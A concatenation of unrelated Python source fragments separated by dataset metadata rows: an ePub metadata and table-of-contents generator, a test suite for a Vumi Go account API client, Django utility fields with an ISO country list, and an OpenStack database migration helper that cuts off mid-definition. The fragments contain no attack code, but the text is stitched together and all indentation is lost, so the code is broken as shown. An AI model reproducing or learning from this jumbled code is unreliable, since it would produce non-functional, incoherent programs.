outputEpub.addHtmlData(files.EpubBaseFiles.TITLE_FILENAME, files.EpubBaseFiles.getTitle(author,
title,
self._metadata.subtitle,
editor,
self._metadata.collectionName,
self._metadata.subCollectionName,
self._metadata.collectionVolume))
outputEpub.addHtmlData(files.EpubBaseFiles.INFO_FILENAME, files.EpubBaseFiles.getInfo(self._metadata.originalTitle,
author,
publicationYear,
translator,
ilustrator,
self._metadata.coverDesigner,
coverModification,
editor))
if self._metadata.dedication or self._options.includeOptionalFiles:
dedication = self._metadata.dedication or ebook_metadata.Metadata.DEFAULT_DEDICATION
outputEpub.addHtmlData(files.EpubBaseFiles.DEDICATION_FILENAME, files.EpubBaseFiles.getDedication(dedication))
outputEpub.addImageData(files.EpubBaseFiles.COVER_IMAGE_FILENAME, coverImage.toBytes())
# Agrego el resto de los archivos del epubbase.
outputEpub.addImageData(files.EpubBaseFiles.EPL_LOGO_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.EPL_LOGO_FILENAME))
outputEpub.addImageData(files.EpubBaseFiles.EX_LIBRIS_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.EX_LIBRIS_FILENAME))
outputEpub.addStyleData(files.EpubBaseFiles.STYLE_FILENAME, files.EpubBaseFiles.getFile(files.EpubBaseFiles.STYLE_FILENAME))
outputEpub.addMetaFile(files.EpubBaseFiles.APPLE_XML, files.EpubBaseFiles.getFile(files.EpubBaseFiles.APPLE_XML))
def _addSectionsAndToc(self, outputEpub):
def processSections(sections):
navPoints = []
previousLevel = "1"
for section in sections:
outputEpub.addHtmlData(section.name, section.toHtml())
hs = section.xpath("//h1 | //h2 | //h3 | //h4 | //h5 | //h6")
for h in hs:
currentLevel = h.tag[-1]
titleText = self._getTitleText(h)
titleId = h.get("id")
titleSrc = "{0}{1}".format(section.name, "#" + titleId if titleId else "")
if currentLevel == "1":
navPoints.append(outputEpub.addNavPoint(titleSrc, titleText))
else:
if currentLevel < previousLevel:
for i in range(int(previousLevel) - int(currentLevel) + 1):
navPoints.pop()
elif currentLevel == previousLevel:
navPoints.pop()
childNavPoint = navPoints[-1].addNavPoint(titleSrc, titleText)
navPoints.append(childNavPoint)
previousLevel = currentLevel
# La cubierta debe ser la primera entrada en la toc.
outputEpub.addNavPoint(files.EpubBaseFiles.COVER_FILENAME, "Cubierta")
# El título del libro debe ser la segunda entrada en la toc.
outputEpub.addNavPoint(files.EpubBaseFiles.TITLE_FILENAME, self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE)
processSections(self._ebookData.iterTextSections())
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
authorsWithBiographyOrImage = [a for a in authors if a.biography or a.image or self._options.includeOptionalFiles]
for i, author in enumerate(authorsWithBiographyOrImage):
biography = author.biography or ebook_metadata.Metadata.DEFAULT_AUTHOR_BIOGRAPHY
image = author.image or images.AuthorImage(files.EpubBaseFiles.getFile(files.EpubBaseFiles.AUTHOR_IMAGE_FILENAME), allowProcessing=False)
title = self._getTocTitleForAuthorFile(authors) if i == 0 else None
imageName = files.EpubBaseFiles.generateAuthorImageFileName(i)
authorContent = files.EpubBaseFiles.getAuthor(biography, title, imageName)
outputEpub.addHtmlData(files.EpubBaseFiles.generateAuthorFileName(i), authorContent)
outputEpub.addImageData(imageName, image.toBytes())
if len(authorsWithBiographyOrImage) > 0:
outputEpub.addNavPoint(files.EpubBaseFiles.AUTHOR_FILENAME, self._getTocTitleForAuthorFile(authors))
processSections(self._ebookData.iterNotesSections())
def _addImages(self, outputEpub):
for image in self._ebookData.iterImages():
outputEpub.addImageData(image.name, image.content)
def _addMetadata(self, outputEpub):
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
author = self._getPersonsListAsText(authors)
# Agrego semántica a cubierta.xhtml.
outputEpub.addReference(files.EpubBaseFiles.COVER_FILENAME, "Cover", "cover")
# Es necesario agregarle semántica a cover.jpg, sino algunos ereaders no la reconocen como imagen de portada.
outputEpub.addCustomMetadata("cover", files.EpubBaseFiles.COVER_IMAGE_FILENAME)
outputEpub.addTitle(self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE)
outputEpub.addAuthor(author[0], author[1])
outputEpub.addLanguage(self._metadata.language or ebook_metadata.Metadata.DEFAULT_LANGUAGE)
if self._metadata.synopsis:
# En la sinopsis (el campo description) en los metadatos, no puedo tener saltos de línea. Podría directamente
# eliminarlos, pero entonces el texto del párrafo B quedaría pegado al del párrafo A. Por eso es que reemplazo
# los saltos de línea por un espacio.
outputEpub.addDescription(utils.removeTags(self._metadata.synopsis.replace("\n", " ")))
else:
outputEpub.addDescription("Sinopsis")
outputEpub.addPublisher("ePubLibre")
# El tipo de género no interesa si debo poner uno por defecto, dado que no aparece en los metadatos del epub.
genres = self._metadata.genres or [ebook_metadata.Genre("bla", "Género", "Subgéneros")]
# Ordeno los géneros alfabéticamente.
genres.sort(key=lambda x: (x.genreType, x.genre, x.subGenre))
genresText = []
previousGenre = ""
for genre in genres:
if genre.genre != previousGenre:
genresText.append(genre.genre)
previousGenre = genre.genre
genresText.append(genre.subGenre)
outputEpub.addSubject(", ".join(genresText))
if self._metadata.translators:
translator = self._getPersonsListAsText(self._metadata.translators)
outputEpub.addTranslator(translator[0], translator[1])
if self._metadata.ilustrators:
ilustrator = self._getPersonsListAsText(self._metadata.ilustrators)
outputEpub.addIlustrator(ilustrator[0], ilustrator[1])
if self._metadata.publicationDate is not None:
outputEpub.addPublicationDate(self._metadata.publicationDate)
if self._metadata.subCollectionName:
calibreSeries = ""
if self._metadata.collectionName:
calibreSeries += "{0}: ".format(self._metadata.collectionName)
calibreSeries += self._metadata.subCollectionName
try:
# Elimino los ceros a la izquierda si se trata de un número.
series_index = str(int(self._metadata.collectionVolume))
except ValueError:
series_index = self._metadata.collectionVolume
outputEpub.addCustomMetadata("calibre:series", calibreSeries)
outputEpub.addCustomMetadata("calibre:series_index", series_index)
def _getOutputFileName(self):
authors = self._metadata.authors or [ebook_metadata.Person(ebook_metadata.Metadata.DEFAULT_AUTHOR, ebook_metadata.Metadata.DEFAULT_AUTHOR)]
fileName = []
authorsFileAs = [author.fileAs for author in authors]
if len(authorsFileAs) < 3:
fileName.append(" & ".join(authorsFileAs))
else:
fileName.append("AA. VV.")
fileName.append(" - ")
if self._metadata.subCollectionName:
collection = ""
if self._metadata.collectionName:
collection += "[{0}] ".format(self._metadata.collectionName)
collection += "[{0} {1}] ".format(self._metadata.subCollectionName, self._metadata.collectionVolume)
if self._metadata.collectionName:
fileName.insert(0, collection)
else:
fileName.append(collection)
fileName.append(self._metadata.title or ebook_metadata.Metadata.DEFAULT_TITLE)
bookId = self._metadata.bookId or ebook_metadata.Metadata.DEFAULT_BOOK_ID
editor = self._metadata.editor or ebook_metadata.Metadata.DEFAULT_EDITOR
fileName.append(" [{0}] (r1.0 {1})".format(bookId, editor))
return utils.toFileName("{0}.epub".format("".join(fileName)))
def _getPersonsListAsText(self, persons):
"""
Convierte una lista de Person a texto. Cada Person se concatena con un & (ampersand).
@param persons: una lista de Person.
@return: una tupla cuyo primer elemento es un string concatenado con todos los nombres, y el
segundo un string concatenado con todos los file-as.
"""
return " & ".join((p.name for p in persons)), " & ".join((p.fileAs for p in persons))
def _getTocTitleForAuthorFile(self, authors):
if not authors or (len(authors) == 1 and authors[0].gender == ebook_metadata.Person.MALE_GENDER):
return "Autor"
else:
return "Autores" if len(authors) > 1 else "Autora"
def _getTitleText(self, h):
"""
Retorna el texto de un título, reemplazando los tags "br" por un espacio.
"""
if h.xpath("descendant::br"):
# No puedo modificar el element "h" directamente, sino que necesito
# trabajar sobre una copia. Una deep copy es otra opción, pero creo
# que va a terminar copiando todoo el tree...
h = etree.fromstring(etree.tostring(h))
for br in h.xpath("descendant::br"):
br.text = " "
etree.strip_tags(h, "br")
return "".join(h.xpath("descendant::text()")) | unlicense | 1,965,789,741,287,960,000 | 50.632867 | 149 | 0.609237 | false |
praekelt/go-http-api | go_http/tests/test_account.py | 1 | 8152 | """
Tests for go_http.account
"""
import collections
import copy
import json
from unittest import TestCase
from requests import HTTPError, Session
from requests.adapters import HTTPAdapter
from requests_testadapter import TestSession, Resp, TestAdapter
from go_http.account import AccountApiClient
from go_http.exceptions import JsonRpcException
from go_http.tests.fixtures import account as fixtures
class FakeAccountApiAdapter(HTTPAdapter):
"""
Adapter providing a fake account API.
This inherits directly from HTTPAdapter instead of using TestAdapter
because it overrides everything TestAdaptor does.
"""
def __init__(self, account_api):
self.account_api = account_api
super(FakeAccountApiAdapter, self).__init__()
def send(self, request, stream=False, timeout=None,
verify=True, cert=None, proxies=None):
response = self.account_api.handle_request(request)
r = self.build_response(request, response)
if not stream:
# force prefetching content unless streaming in use
r.content
return r
class FakeAccountApi(object):
def __init__(self, api_path, auth_token):
self.api_path = api_path
self.auth_token = auth_token
self.responses = collections.defaultdict(list)
def http_error_response(self, http_code, error):
return Resp("403 Forbidden", 403, headers={})
def jsonrpc_error_response(self, fault, fault_code, fault_string):
return Resp(json.dumps({
"error": {
"fault": fault, "faultCode": fault_code,
"faultString": fault_string,
},
}), 200, headers={})
def jsonrpc_success_response(self, result):
return Resp(json.dumps({
"error": None,
"result": result,
}), 200, headers={})
def add_success_response(self, method, params, result):
self.responses[method].append((params, copy.deepcopy(result), None))
def add_error_response(self, method, params, **error):
self.responses[method].append((params, None, error))
def handle_request(self, request):
if request.headers['Authorization'] != 'Bearer %s' % (
self.auth_token):
return self.http_error_response(403, "403 Forbidden")
if request.headers['Content-Type'] != (
'application/json; charset=utf-8'):
return self.http_error_response(400, "Invalid Content-Type.")
if request.method != "POST":
return self.jsonrpc_error_response(
"Fault", 8000, "Only POST method supported")
data = json.loads(request.body)
params, result, error = self.responses[data['method']].pop()
assert params == data['params']
if error is not None:
return self.jsonrpc_error_response(**error)
return self.jsonrpc_success_response(result)
class TestAccountApiClient(TestCase):
API_URL = "http://example.com/go"
AUTH_TOKEN = "auth_token"
def setUp(self):
self.account_backend = FakeAccountApi("go/", self.AUTH_TOKEN)
self.session = TestSession()
self.adapter = FakeAccountApiAdapter(self.account_backend)
self.simulate_api_up()
def simulate_api_down(self):
self.session.mount(self.API_URL, TestAdapter("API is down", 500))
def simulate_api_up(self):
self.session.mount(self.API_URL, self.adapter)
def make_client(self, auth_token=AUTH_TOKEN):
return AccountApiClient(
auth_token, api_url=self.API_URL, session=self.session)
def assert_http_error(self, expected_status, func, *args, **kw):
try:
func(*args, **kw)
except HTTPError as err:
self.assertEqual(err.response.status_code, expected_status)
else:
self.fail(
"Expected HTTPError with status %s." % (expected_status,))
def assert_jsonrpc_exception(self, f, *args, **kw):
try:
f(*args, **kw)
except Exception as err:
self.assertTrue(isinstance(err, JsonRpcException))
self.assertTrue(isinstance(err.fault, unicode))
self.assertTrue(isinstance(err.fault_code, int))
self.assertTrue(isinstance(err.fault_string, unicode))
return err
def test_assert_http_error(self):
self.session.mount("http://bad.example.com/", TestAdapter("", 500))
def bad_req():
r = self.session.get("http://bad.example.com/")
r.raise_for_status()
# Fails when no exception is raised.
self.assertRaises(
self.failureException, self.assert_http_error, 404, lambda: None)
# Fails when an HTTPError with the wrong status code is raised.
self.assertRaises(
self.failureException, self.assert_http_error, 404, bad_req)
# Passes when an HTTPError with the expected status code is raised.
self.assert_http_error(500, bad_req)
# Non-HTTPError exceptions aren't caught.
def raise_error():
raise ValueError()
self.assertRaises(ValueError, self.assert_http_error, 404, raise_error)
def test_default_session(self):
client = AccountApiClient(self.AUTH_TOKEN)
self.assertTrue(isinstance(client.session, Session))
def test_default_api_url(self):
client = AccountApiClient(self.AUTH_TOKEN)
self.assertEqual(
client.api_url, "https://go.vumi.org/api/v1/go")
def test_auth_failure(self):
client = self.make_client(auth_token="bogus_token")
self.assert_http_error(403, client.campaigns)
def test_jsonrpc_error_handling(self):
client = self.make_client()
self.account_backend.add_error_response(
"campaigns", [],
fault="Fault", fault_code=8002, fault_string="Meep")
err = self.assert_jsonrpc_exception(client.campaigns)
self.assertEqual(err.fault, "Fault")
self.assertEqual(err.fault_code, 8002)
self.assertEqual(err.fault_string, "Meep")
def test_campaigns(self):
client = self.make_client()
self.account_backend.add_success_response(
"campaigns", [], fixtures.campaigns)
self.assertEqual(client.campaigns(), fixtures.campaigns)
def test_conversations(self):
client = self.make_client()
self.account_backend.add_success_response(
"conversations", ["campaign-1"], fixtures.conversations)
self.assertEqual(
client.conversations("campaign-1"),
fixtures.conversations)
def test_channels(self):
client = self.make_client()
self.account_backend.add_success_response(
"channels", ["campaign-1"], fixtures.channels)
self.assertEqual(
client.channels("campaign-1"),
fixtures.channels)
def test_routers(self):
client = self.make_client()
self.account_backend.add_success_response(
"routers", ["campaign-1"], fixtures.routers)
self.assertEqual(
client.routers("campaign-1"),
fixtures.routers)
def test_routing_entries(self):
client = self.make_client()
self.account_backend.add_success_response(
"routing_entries", ["campaign-1"], fixtures.routing_entries)
self.assertEqual(
client.routing_entries("campaign-1"),
fixtures.routing_entries)
def test_routing_table(self):
client = self.make_client()
self.account_backend.add_success_response(
"routing_table", ["campaign-1"], fixtures.routing_table)
self.assertEqual(
client.routing_table("campaign-1"),
fixtures.routing_table)
def test_update_routing_tabel(self):
client = self.make_client()
self.account_backend.add_success_response(
"update_routing_table", ["campaign-1", fixtures.routing_table],
None)
self.assertEqual(
client.update_routing_table("campaign-1", fixtures.routing_table),
None)
| bsd-3-clause | 8,543,179,118,958,206,000 | 34.911894 | 79 | 0.625859 | false |
artminster/artminster | core/utils/fields.py | 1 | 10035 | from django.utils.translation import ugettext as _
from django.db import models, connection
from django.utils.text import capfirst
from itertools import chain
from django.utils.html import conditional_escape
from django.utils.safestring import mark_safe
from django.utils.encoding import force_unicode, smart_unicode
from django import forms
from itertools import chain
from django.conf import settings
from django.contrib.admin import widgets
from django.utils.html import escape
from django.forms.fields import EMPTY_VALUES, Field
from django.forms import ValidationError
from django.db.models.signals import post_delete, post_save
from south.modelsinspector import add_introspection_rules
from django.db.models import OneToOneField
from django.db.models.fields.related import SingleRelatedObjectDescriptor
qn = connection.ops.quote_name
import re
uk_landline_re = re.compile(r'^[0]{1}[1-9]{1}[0-9]{9}$')
uk_landline_no08or09_re = re.compile(r'^[0]{1}[1-7]{1}[0-9]{9}$')
uk_mobile_re = re.compile(r'^(07)[0-9]{9}')
international_number_re = re.compile(r'^[+]?([0-9]*[\.\s\-\(\)]|[0-9]+){3,24}$')
from django.db.models import OneToOneField
from django.db.models.fields.related import SingleRelatedObjectDescriptor
class AutoSingleRelatedObjectDescriptor(SingleRelatedObjectDescriptor):
def __get__(self, instance, instance_type=None):
try:
return super(AutoSingleRelatedObjectDescriptor, self).__get__(instance, instance_type)
except self.related.model.DoesNotExist:
obj = self.related.model(**{self.related.field.name: instance})
obj.save()
return obj
class AutoOneToOneField(OneToOneField):
'''
OneToOneField creates related object on first call if it doesnt exist yet.
Use it instead of original OneToOne field.
example:
class MyProfile(models.Model):
user = AutoOneToOneField(User, primary_key=True)
home_page = models.URLField(max_length=255, blank=True)
icq = models.IntegerField(max_length=255, null=True)
'''
def contribute_to_related_class(self, cls, related):
setattr(cls, related.get_accessor_name(), AutoSingleRelatedObjectDescriptor(related))
def south_field_triple(self):
"Returns a suitable description of this field for South."
from south.modelsinspector import introspector
field_class = OneToOneField.__module__ + "." + OneToOneField.__name__
args, kwargs = introspector(self)
return (field_class, args, kwargs)
# ISO 3166-1 country names and codes adapted from http://opencountrycodes.appspot.com/python/
COUNTRIES = [
('GB', _('United Kingdom')),
('US', _('United States')),
('AF', _('Afghanistan')),
('AX', _('Aland Islands')),
('AL', _('Albania')),
('DZ', _('Algeria')),
('AS', _('American Samoa')),
('AD', _('Andorra')),
('AO', _('Angola')),
('AI', _('Anguilla')),
('AQ', _('Antarctica')),
('AG', _('Antigua and Barbuda')),
('AR', _('Argentina')),
('AM', _('Armenia')),
('AW', _('Aruba')),
('AU', _('Australia')),
('AT', _('Austria')),
('AZ', _('Azerbaijan')),
('BS', _('Bahamas')),
('BH', _('Bahrain')),
('BD', _('Bangladesh')),
('BB', _('Barbados')),
('BY', _('Belarus')),
('BE', _('Belgium')),
('BZ', _('Belize')),
('BJ', _('Benin')),
('BM', _('Bermuda')),
('BT', _('Bhutan')),
('BO', _('Bolivia')),
('BA', _('Bosnia and Herzegovina')),
('BW', _('Botswana')),
('BV', _('Bouvet Island')),
('BR', _('Brazil')),
('BN', _('Brunei Darussalam')),
('BG', _('Bulgaria')),
('BF', _('Burkina Faso')),
('BI', _('Burundi')),
('KH', _('Cambodia')),
('CM', _('Cameroon')),
('CA', _('Canada')),
('CV', _('Cape Verde')),
('KY', _('Cayman Islands')),
('CF', _('Central African Republic')),
('TD', _('Chad')),
('CL', _('Chile')),
('CN', _('China')),
('CX', _('Christmas Island')),
('CC', _('Cocos Islands')),
('CO', _('Colombia')),
('KM', _('Comoros')),
('CG', _('Congo')),
('CD', _('Congo')),
('CK', _('Cook Islands')),
('CR', _('Costa Rica')),
('CI', _("Cote d'Ivoire")),
('HR', _('Croatia')),
('CU', _('Cuba')),
('CY', _('Cyprus')),
('CZ', _('Czech Republic')),
('DK', _('Denmark')),
('DJ', _('Djibouti')),
('DM', _('Dominica')),
('DO', _('Dominican Republic')),
('EC', _('Ecuador')),
('EG', _('Egypt')),
('SV', _('El Salvador')),
('GQ', _('Equatorial Guinea')),
('ER', _('Eritrea')),
('EE', _('Estonia')),
('ET', _('Ethiopia')),
('FK', _('Falkland Islands')),
('FO', _('Faroe Islands')),
('FJ', _('Fiji')),
('FI', _('Finland')),
('FR', _('France')),
('GF', _('French Guiana')),
('PF', _('French Polynesia')),
('GA', _('Gabon')),
('GM', _('Gambia')),
('GE', _('Georgia')),
('DE', _('Germany')),
('GH', _('Ghana')),
('GI', _('Gibraltar')),
('GR', _('Greece')),
('GL', _('Greenland')),
('GD', _('Grenada')),
('GP', _('Guadeloupe')),
('GU', _('Guam')),
('GT', _('Guatemala')),
('GG', _('Guernsey')),
('GN', _('Guinea')),
('GW', _('Guinea-Bissau')),
('GY', _('Guyana')),
('HT', _('Haiti')),
('HN', _('Honduras')),
('HK', _('Hong Kong')),
('HU', _('Hungary')),
('IS', _('Iceland')),
('IN', _('India')),
('ID', _('Indonesia')),
('IR', _('Iran')),
('IQ', _('Iraq')),
('IE', _('Ireland')),
('IM', _('Isle of Man')),
('IL', _('Israel')),
('IT', _('Italy')),
('JM', _('Jamaica')),
('JP', _('Japan')),
('JE', _('Jersey')),
('JO', _('Jordan')),
('KZ', _('Kazakhstan')),
('KE', _('Kenya')),
('KI', _('Kiribati')),
('KP', _('Korea')),
('KR', _('Korea, Republic of')),
('KW', _('Kuwait')),
('KG', _('Kyrgyzstan')),
('LA', _('Lao')),
('LV', _('Latvia')),
('LB', _('Lebanon')),
('LS', _('Lesotho')),
('LR', _('Liberia')),
('LY', _('Libyan Arab Jamahiriya')),
('LI', _('Liechtenstein')),
('LT', _('Lithuania')),
('LU', _('Luxembourg')),
('MO', _('Macao')),
('MK', _('Macedonia')),
('MG', _('Madagascar')),
('MW', _('Malawi')),
('MY', _('Malaysia')),
('MV', _('Maldives')),
('ML', _('Mali')),
('MT', _('Malta')),
('MH', _('Marshall Islands')),
('MQ', _('Martinique')),
('MR', _('Mauritania')),
('MU', _('Mauritius')),
('YT', _('Mayotte')),
('MX', _('Mexico')),
('MD', _('Moldova')),
('MC', _('Monaco')),
('MN', _('Mongolia')),
('ME', _('Montenegro')),
('MS', _('Montserrat')),
('MA', _('Morocco')),
('MZ', _('Mozambique')),
('MM', _('Myanmar')),
('NA', _('Namibia')),
('NR', _('Nauru')),
('NP', _('Nepal')),
('NL', _('Netherlands')),
('AN', _('Netherlands Antilles')),
('NC', _('New Caledonia')),
('NZ', _('New Zealand')),
('NI', _('Nicaragua')),
('NE', _('Niger')),
('NG', _('Nigeria')),
('NU', _('Niue')),
('NF', _('Norfolk Island')),
('MP', _('Northern Mariana Islands')),
('NO', _('Norway')),
('OM', _('Oman')),
('PK', _('Pakistan')),
('PW', _('Palau')),
('PA', _('Panama')),
('PG', _('Papua New Guinea')),
('PY', _('Paraguay')),
('PE', _('Peru')),
('PH', _('Philippines')),
('PN', _('Pitcairn')),
('PL', _('Poland')),
('PT', _('Portugal')),
('PR', _('Puerto Rico')),
('QA', _('Qatar')),
('RE', _('Reunion')),
('RO', _('Romania')),
('RU', _('Russian Federation')),
('RW', _('Rwanda')),
('BL', _('Saint Barthelemy')),
('SH', _('Saint Helena')),
('KN', _('Saint Kitts and Nevis')),
('LC', _('Saint Lucia')),
('MF', _('Saint Martin')),
('WS', _('Samoa')),
('SM', _('San Marino')),
('ST', _('Sao Tome and Principe')),
('SA', _('Saudi Arabia')),
('SN', _('Senegal')),
('RS', _('Serbia')),
('SC', _('Seychelles')),
('SL', _('Sierra Leone')),
('SG', _('Singapore')),
('SK', _('Slovakia')),
('SI', _('Slovenia')),
('SB', _('Solomon Islands')),
('SO', _('Somalia')),
('ZA', _('South Africa')),
('ES', _('Spain')),
('LK', _('Sri Lanka')),
('SD', _('Sudan')),
('SR', _('Suriname')),
('SJ', _('Svalbard and Jan Mayen')),
('SZ', _('Swaziland')),
('SE', _('Sweden')),
('CH', _('Switzerland')),
('SY', _('Syrian Arab Republic')),
('TW', _('Taiwan')),
('TJ', _('Tajikistan')),
('TZ', _('Tanzania')),
('TH', _('Thailand')),
('TL', _('Timor-Leste')),
('TG', _('Togo')),
('TK', _('Tokelau')),
('TO', _('Tonga')),
('TT', _('Trinidad and Tobago')),
('TN', _('Tunisia')),
('TR', _('Turkey')),
('TM', _('Turkmenistan')),
('TC', _('Turks and Caicos Islands')),
('TV', _('Tuvalu')),
('UG', _('Uganda')),
('UA', _('Ukraine')),
('AE', _('United Arab Emirates')),
('UY', _('Uruguay')),
('UZ', _('Uzbekistan')),
('VU', _('Vanuatu')),
('VE', _('Venezuela')),
('VN', _('Viet Nam')),
('VG', _('Virgin Islands, British')),
('VI', _('Virgin Islands, U.S.')),
('WF', _('Wallis and Futuna')),
('EH', _('Western Sahara')),
('YE', _('Yemen')),
('ZM', _('Zambia')),
('ZW', _('Zimbabwe')),
]
class CountryField(models.CharField):
def __init__(self, *args, **kwargs):
kwargs.setdefault('max_length', 2)
kwargs.setdefault('choices', COUNTRIES)
super(CountryField, self).__init__(*args, **kwargs)
def get_internal_type(self):
return "CharField"
# SOUTH INTROSPECTION RULES
add_introspection_rules([], ["^filebrowser\.fields\.FileBrowseField"])
add_introspection_rules([], ["^artminster\.core\.utils\.fields\.CountryField"]) | mit | 4,693,943,054,560,884,000 | 30.264798 | 98 | 0.47703 | false |
JioCloud/oslo-incubator | openstack/common/db/sqlalchemy/migration.py | 1 | 10048 | # coding: utf-8
#
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Base on code in migrate/changeset/databases/sqlite.py which is under
# the following license:
#
# The MIT License
#
# Copyright (c) 2009 Evan Rosson, Jan Dittberner, Domen Kožar
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
import distutils.version as dist_version
import os
import re
import migrate
from migrate.changeset import ansisql
from migrate.changeset.databases import sqlite
from migrate.versioning import util as migrate_util
import sqlalchemy
from sqlalchemy.schema import UniqueConstraint
from openstack.common.db import exception
from openstack.common.db.sqlalchemy import session as db_session
from openstack.common.gettextutils import _ # noqa
@migrate_util.decorator
def patched_with_engine(f, *a, **kw):
url = a[0]
engine = migrate_util.construct_engine(url, **kw)
try:
kw['engine'] = engine
return f(*a, **kw)
finally:
if isinstance(engine, migrate_util.Engine) and engine is not url:
migrate_util.log.debug('Disposing SQLAlchemy engine %s', engine)
engine.dispose()
# TODO(jkoelker) When migrate 0.7.3 is released and nova depends
# on that version or higher, this can be removed
MIN_PKG_VERSION = dist_version.StrictVersion('0.7.3')
if (not hasattr(migrate, '__version__') or
dist_version.StrictVersion(migrate.__version__) < MIN_PKG_VERSION):
migrate_util.with_engine = patched_with_engine
# NOTE(jkoelker) Delay importing migrate until we are patched
from migrate import exceptions as versioning_exceptions
from migrate.versioning import api as versioning_api
from migrate.versioning.repository import Repository
_REPOSITORY = None
get_engine = db_session.get_engine
def _get_unique_constraints(self, table):
"""Retrieve information about existing unique constraints of the table
This feature is needed for _recreate_table() to work properly.
Unfortunately, it's not available in sqlalchemy 0.7.x/0.8.x.
"""
data = table.metadata.bind.execute(
"""SELECT sql
FROM sqlite_master
WHERE
type='table' AND
name=:table_name""",
table_name=table.name
).fetchone()[0]
UNIQUE_PATTERN = "CONSTRAINT (\w+) UNIQUE \(([^\)]+)\)"
return [
UniqueConstraint(
*[getattr(table.columns, c.strip(' "')) for c in cols.split(",")],
name=name
)
for name, cols in re.findall(UNIQUE_PATTERN, data)
]
def _recreate_table(self, table, column=None, delta=None, omit_uniques=None):
"""Recreate the table properly
Unlike the corresponding original method of sqlalchemy-migrate this one
doesn't drop existing unique constraints when creating a new one.
"""
table_name = self.preparer.format_table(table)
# we remove all indexes so as not to have
# problems during copy and re-create
for index in table.indexes:
index.drop()
# reflect existing unique constraints
for uc in self._get_unique_constraints(table):
table.append_constraint(uc)
# omit given unique constraints when creating a new table if required
table.constraints = set([
cons for cons in table.constraints
if omit_uniques is None or cons.name not in omit_uniques
])
self.append('ALTER TABLE %s RENAME TO migration_tmp' % table_name)
self.execute()
insertion_string = self._modify_table(table, column, delta)
table.create(bind=self.connection)
self.append(insertion_string % {'table_name': table_name})
self.execute()
self.append('DROP TABLE migration_tmp')
self.execute()
def _visit_migrate_unique_constraint(self, *p, **k):
"""Drop the given unique constraint
The corresponding original method of sqlalchemy-migrate just
raises NotImplemented error
"""
self.recreate_table(p[0].table, omit_uniques=[p[0].name])
def patch_migrate():
"""A workaround for SQLite's inability to alter things
SQLite abilities to alter tables are very limited (please read
http://www.sqlite.org/lang_altertable.html for more details).
E. g. one can't drop a column or a constraint in SQLite. The
workaround for this is to recreate the original table omitting
the corresponding constraint (or column).
sqlalchemy-migrate library has recreate_table() method that
implements this workaround, but it does it wrong:
- information about unique constraints of a table
is not retrieved. So if you have a table with one
unique constraint and a migration adding another one
you will end up with a table that has only the
latter unique constraint, and the former will be lost
- dropping of unique constraints is not supported at all
The proper way to fix this is to provide a pull-request to
sqlalchemy-migrate, but the project seems to be dead. So we
can go on with monkey-patching of the lib at least for now.
"""
# this patch is needed to ensure that recreate_table() doesn't drop
# existing unique constraints of the table when creating a new one
helper_cls = sqlite.SQLiteHelper
helper_cls.recreate_table = _recreate_table
helper_cls._get_unique_constraints = _get_unique_constraints
# this patch is needed to be able to drop existing unique constraints
constraint_cls = sqlite.SQLiteConstraintDropper
constraint_cls.visit_migrate_unique_constraint = \
_visit_migrate_unique_constraint
constraint_cls.__bases__ = (ansisql.ANSIColumnDropper,
sqlite.SQLiteConstraintGenerator)
def db_sync(abs_path, version=None, init_version=0):
"""Upgrade or downgrade a database.
Function runs the upgrade() or downgrade() functions in change scripts.
:param abs_path: Absolute path to migrate repository.
:param version: Database will upgrade/downgrade until this version.
If None - database will update to the latest
available version.
:param init_version: Initial database version
"""
if version is not None:
try:
version = int(version)
except ValueError:
raise exception.DbMigrationError(
message=_("version should be an integer"))
current_version = db_version(abs_path, init_version)
repository = _find_migrate_repo(abs_path)
if version is None or version > current_version:
return versioning_api.upgrade(get_engine(), repository, version)
else:
return versioning_api.downgrade(get_engine(), repository,
version)
def db_version(abs_path, init_version):
"""Show the current version of the repository.
:param abs_path: Absolute path to migrate repository
:param version: Initial database version
"""
repository = _find_migrate_repo(abs_path)
try:
return versioning_api.db_version(get_engine(), repository)
except versioning_exceptions.DatabaseNotControlledError:
meta = sqlalchemy.MetaData()
engine = get_engine()
meta.reflect(bind=engine)
tables = meta.tables
if len(tables) == 0:
db_version_control(abs_path, init_version)
return versioning_api.db_version(get_engine(), repository)
else:
# Some pre-Essex DB's may not be version controlled.
# Require them to upgrade using Essex first.
raise exception.DbMigrationError(
message=_("Upgrade DB using Essex release first."))
def db_version_control(abs_path, version=None):
"""Mark a database as under this repository's version control.
Once a database is under version control, schema changes should
only be done via change scripts in this repository.
:param abs_path: Absolute path to migrate repository
:param version: Initial database version
"""
repository = _find_migrate_repo(abs_path)
versioning_api.version_control(get_engine(), repository, version)
return version
def _find_migrate_repo(abs_path):
